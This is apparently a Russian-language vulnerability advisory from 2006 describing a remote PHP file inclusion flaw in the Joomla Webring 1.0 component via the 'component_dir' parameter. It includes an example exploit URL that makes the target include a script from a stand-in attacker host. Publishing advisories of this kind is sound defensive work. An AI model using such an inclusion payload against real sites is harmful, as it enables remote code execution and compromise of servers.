PHP-инклюдинг в Joomla Webring

Дата публикации:
18.08.2006
Всего просмотров:
5128
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Webring 1.x (компонент к Joomla)
Уязвимые версии: Webring (компонент Joomla) 1.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "component_dir" в сценарии administrator/components/com_webring/admin.webring.docs.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/[path]/administrator/components/ com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?

URL производителя: www.joomlaresource.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Joomla Webring Component (component_dir) Remote File Inclusion Vulnerabilities

или введите имя

CAPTCHA